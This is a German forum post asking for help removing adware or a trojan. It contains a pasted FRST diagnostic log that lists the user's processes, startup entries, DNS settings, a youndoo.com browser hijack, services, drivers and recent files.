| |
| |||||||
Log-Analyse und Auswertung: Trojaner, Adware oder sonstiges ?Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML. |
 |
19.05.2017, 14:04
| #1 |
 |  Trojaner, Adware oder sonstiges ? Hallo Trojaner Board, nach langem googeln bin ich auf eure Seite gestoßen. Ich habe gesehen das ihr schon einigen Usern geholfen habt. Ich bin sicher das mein Rechner mit irgendwas befallen ist. Am ausfälligsten ist das diverse Browser ( Firefox und Edge ) jeweils unzählige Pop Ups öffnen will, die dank Ad Blocker aber geblockt werden. Einziger Browser mit dem ich halbwegs surfen kann ist der Internet Explorer. Außerdem habe ich festgestellt das sich in der Taskleiste zwischenzeitlich für einen Bruchteil einer Sekunde Prozesse öffnen die ich bisher nicht identifizieren konnte. Habe schon Bitdefender ausprobiert. Dieser findet zwar immer wieder Trojaner und entfernt diese. Jedoch wurde das Problem bisher nicht behoben. Habe schon Vorarbeit geleistet und poste die letzten Logs von Farbar und Bitdefender. Ich hoffe jemand von euch kann mir helfen. Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 14-05-2017
durchgeführt von Dino (Administrator) auf **** (19-05-2017 14:42:00)
Gestartet von D:\Dino\Downloads
Geladene Profile: Dino (Verfügbare Profile: Dino)
Platform: Windows 10 Pro Version 1703 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
() C:\Windows\SysWOW64\ASGT.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe
() C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe
(Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(AMD) C:\Windows\System32\atieclxx.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe
() C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
(ASUS) C:\Program Files (x86)\ASUS\GPU Tweak\Monitor.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
() C:\Program Files (x86)\ASUS\AI Suite III\AsusMiniBar.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(Spotify Ltd) C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Samsung) C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe
(CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe
() C:\Program Files (x86)\Drakonia Configurator\hid.exe
() C:\Program Files (x86)\Drakonia Configurator\trayicon.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(Microsoft Corporation) C:\Config.Msi\8cb2c81.rbf
(Samsung Electronics.) C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe
() C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8126.42377.0_x64__8wekyb3d8bbwe\HxMail.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.8126.42377.0_x64__8wekyb3d8bbwe\HxTsr.exe
(VS Revo Group) C:\Program Files\VS Revo Group\Revo Uninstaller\RevoUnin.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
==================== Registry (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8466136 2015-04-30] (Realtek Semiconductor)
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [438888 2014-01-15] (CANON INC.)
HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [210432 2016-07-05] (Geek Software GmbH)
HKLM-x32\...\Run: [GamingMouse] => C:\Program Files (x86)\Drakonia Configurator\hid.exe [248832 2013-10-29] ()
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [Spotify Web Helper] => C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-02-19] (Spotify Ltd)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [SmartSwitchPDLR.exe] => C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe [1037992 2017-02-07] (Samsung)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\MountPoints2: {ab244902-eb0d-11e4-8257-806e6f6e6963} - "E:\autorun.exe"
GroupPolicyScripts-x32: Beschränkung <======= ACHTUNG
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [DhcpNameServer] 192.168.0.1
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.de/
BHO: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery64.dll [2015-01-23] (Ghostery, Inc.)
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll [2015-02-25] (Eyeo GmbH)
BHO-x32: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO-x32: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery.dll [2015-01-23] (Ghostery, Inc.)
BHO-x32: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll [2015-02-25] (Eyeo GmbH)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM-x32 - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)
FireFox:
========
FF ProfilePath: C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 [2017-05-19]
FF Homepage: Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 -> google.de/
FF HKLM\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff [2017-05-01]
FF HKLM\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext [2017-01-19] [ist nicht signiert]
FF HKLM-x32\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF HKLM-x32\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)
Chrome:
=======
CHR DefaultProfile: ChromeDefaultData
CHR HomePage: ChromeDefaultData -> hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.youndoo.com/?z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=hp"
CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.youndoo.com/search/?q={searchTerms}&z=29cb5008ab1dbbc7820f6fbg3z6b7q2c9gde0o1b9q&from=wak&uid=SamsungXSSDX850XPROX256GB_S251NSAG301960E&type=sp
CHR DefaultSearchKeyword: ChromeDefaultData -> youndoo
CHR Profile: C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-02-05] <==== ACHTUNG
CHR Extension: (Google Präsentationen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-22]
CHR Extension: (Google Docs) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-22]
CHR Extension: (Google Drive) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-22]
CHR Extension: (YouTube) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-22]
CHR Extension: (Google-Suche) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-22]
CHR Extension: (Google Tabellen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-22]
CHR Extension: (Google Docs Offline) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-22]
CHR Extension: (CrowdBar) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\lhinknkceoifkecnmmlgnelmdipmbcdn [2015-11-22]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-22]
CHR Extension: (Google Mail) - C:\Users\Dino\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-22]
CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl] - hxxps://clients2.google.com/service/update2/crx
==================== Dienste (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2013-07-04] ()
R2 ASGT; C:\Windows\SysWOW64\ASGT.exe [55296 2012-01-17] () [Datei ist nicht signiert]
R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe [954648 2014-09-09] (ASUSTeK Computer Inc.)
R2 AsusFanControlService; C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe [384000 2014-10-11] (ASUSTeK Computer Inc.) [Datei ist nicht signiert]
S3 EasyAntiCheat; C:\WINDOWS\SysWOW64\EasyAntiCheat.exe [409128 2017-02-23] (EasyAntiCheat Ltd)
S3 ElfoService; D:\Programme\ElsterFormular Update Service\bin\ElfoService.exe [1283304 2017-03-20] ()
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [Datei ist nicht signiert]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2007048 2015-08-22] (Electronic Arts)
R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1230824 2017-02-22] (Bitdefender)
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [4088608 2016-09-21] (Safer-Networking Ltd.) [Datei ist nicht signiert]
S2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [235984 2016-11-24] (Safer-Networking Ltd.) [Datei ist nicht signiert]
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [3913064 2017-03-20] (Microsoft Corporation)
R2 ss_conn_service; C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-07-22] (DEVGURU Co., LTD.)
R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe [218416 2017-04-24] (Bitdefender)
R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe [1424224 2017-05-02] (Bitdefender)
R2 vsservp; C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe [524872 2016-08-25] (Bitdefender)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation)
===================== Treiber (Nicht auf der Ausnahmeliste) ======================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 amdacpksd; C:\WINDOWS\system32\drivers\amdacpksd.sys [305392 2016-04-05] (Advanced Micro Devices)
S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [49448 2016-08-18] (Advanced Micro Devices, Inc.)
R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmdag.sys [36558208 2017-05-16] (Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmpag.sys [528760 2017-05-16] (Advanced Micro Devices, Inc.)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2013-07-04] ()
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [110088 2017-03-31] (Advanced Micro Devices)
R0 avc3; C:\WINDOWS\System32\DRIVERS\avc3.sys [1605376 2016-09-20] (BitDefender)
R3 avckf; C:\WINDOWS\System32\DRIVERS\avckf.sys [878072 2016-09-20] (BitDefender)
S0 bdelam; C:\WINDOWS\System32\drivers\bdelam.sys [23672 2016-03-14] (Bitdefender)
R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [128400 2016-06-24] (BitDefender LLC)
R1 BDVEDISK; C:\WINDOWS\system32\DRIVERS\bdvedisk.sys [87912 2015-12-04] (BitDefender)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
R0 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [182944 2016-10-29] (BitDefender LLC)
R0 ignis; C:\WINDOWS\system32\DRIVERS\ignis.sys [305120 2017-03-20] (Bitdefender)
R3 IOMap; C:\WINDOWS\system32\drivers\IOMap64.sys [24824 2014-10-23] (ASUSTeK Computer Inc.)
R3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
R1 NNSALPC; C:\WINDOWS\system32\DRIVERS\NNSALPC.sys [103824 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTP; C:\WINDOWS\system32\DRIVERS\NNSHTTP.sys [211352 2015-07-17] (Panda Security, S.L.)
R1 NNSHTTPS; C:\WINDOWS\system32\DRIVERS\NNSHTTPS.sys [120216 2015-07-17] (Panda Security, S.L.)
R1 NNSIDS; C:\WINDOWS\system32\DRIVERS\NNSIDS.sys [120208 2015-07-17] (Panda Security, S.L.)
R1 NNSNAHSL; C:\WINDOWS\system32\DRIVERS\NNSNAHSL.sys [58616 2015-06-19] (Panda Security, S.L.)
R1 NNSPICC; C:\WINDOWS\system32\DRIVERS\NNSPICC.sys [112536 2015-07-17] (Panda Security, S.L.)
R1 NNSPIHSW; C:\WINDOWS\system32\DRIVERS\NNSPIHSW.sys [89472 2015-09-01] (Panda Security, S.L.)
R1 NNSPOP3; C:\WINDOWS\system32\DRIVERS\NNSPOP3.sys [133528 2015-07-17] (Panda Security, S.L.)
R1 NNSPROT; C:\WINDOWS\system32\DRIVERS\NNSPROT.sys [309648 2015-07-17] (Panda Security, S.L.)
R1 NNSPRV; C:\WINDOWS\system32\DRIVERS\NNSPRV.sys [179608 2015-07-17] (Panda Security, S.L.)
R1 NNSSMTP; C:\WINDOWS\system32\DRIVERS\NNSSMTP.sys [122776 2015-07-17] (Panda Security, S.L.)
R1 NNSSTRM; C:\WINDOWS\system32\DRIVERS\NNSSTRM.sys [267160 2015-07-17] (Panda Security, S.L.)
R1 NNSTLSC; C:\WINDOWS\system32\DRIVERS\NNSTLSC.sys [115600 2015-07-17] (Panda Security, S.L.)
R2 PSINAflt; C:\WINDOWS\System32\DRIVERS\PSINAflt.sys [173464 2015-07-22] (Panda Security, S.L.)
R2 PSINFile; C:\WINDOWS\System32\DRIVERS\PSINFile.sys [130968 2015-07-22] (Panda Security, S.L.)
R1 PSINKNC; C:\WINDOWS\system32\DRIVERS\PSINKNC.sys [207256 2015-07-22] (Panda Security, S.L.)
R2 PSINProc; C:\WINDOWS\System32\DRIVERS\PSINProc.sys [133528 2015-07-22] (Panda Security, S.L.)
R2 PSINProt; C:\WINDOWS\System32\DRIVERS\PSINProt.sys [143768 2015-07-22] (Panda Security, S.L.)
R2 PSINReg; C:\WINDOWS\system32\DRIVERS\PSINReg.sys [117144 2015-07-22] (Panda Security, S.L.)
S3 PSKMAD; C:\WINDOWS\System32\DRIVERS\PSKMAD.sys [62080 2015-06-16] (Panda Security, S.L.)
R3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-05] (Scarlet.Crush Productions)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
S2 RtNdPt630; \SystemRoot\system32\DRIVERS\RtNdPt630.sys [X]
S3 RTTEAMPT; \SystemRoot\system32\DRIVERS\RtTeam620.sys [X]
S3 RTVLANPT; \SystemRoot\system32\DRIVERS\RtVlan620.sys [X]
==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat: Erstellte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-05-19 14:28 - 2017-05-19 14:42 - 00000000 ____D C:\FRST
2017-05-19 13:51 - 2017-05-19 13:51 - 00000000 ___HD C:\OneDriveTemp
2017-05-17 21:18 - 2017-05-17 21:18 - 00003160 _____ C:\WINDOWS\System32\Tasks\StartCN
2017-05-17 21:18 - 2017-05-17 21:18 - 00000000 ____D C:\WINDOWS\LastGood.Tmp
2017-05-17 21:18 - 2017-05-17 21:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2017-05-16 18:06 - 2017-05-16 18:06 - 00121208 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00112000 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029056 _____ (Microsoft Corporation) C:\WINDOWS\system32\detoured.dll
2017-05-16 18:06 - 2017-05-16 18:06 - 00029048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\detoured.dll
2017-05-09 21:39 - 2017-04-28 03:38 - 01411128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 01839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:19 - 00605936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:18 - 02259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:16 - 00599576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 01604312 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-05-09 21:39 - 2017-04-28 03:12 - 00543640 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2017-05-09 21:39 - 2017-04-28 03:11 - 02158544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-05-09 21:39 - 2017-04-28 03:09 - 01557288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 08320920 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-05-09 21:39 - 2017-04-28 03:08 - 02399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 02330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-05-09 21:39 - 2017-04-28 03:08 - 00775824 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 06759512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-05-09 21:39 - 2017-04-28 03:07 - 00988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-05-09 21:39 - 2017-04-28 03:06 - 00708712 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2017-05-09 21:39 - 2017-04-28 03:05 - 00923040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-05-09 21:39 - 2017-04-28 03:04 - 00583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
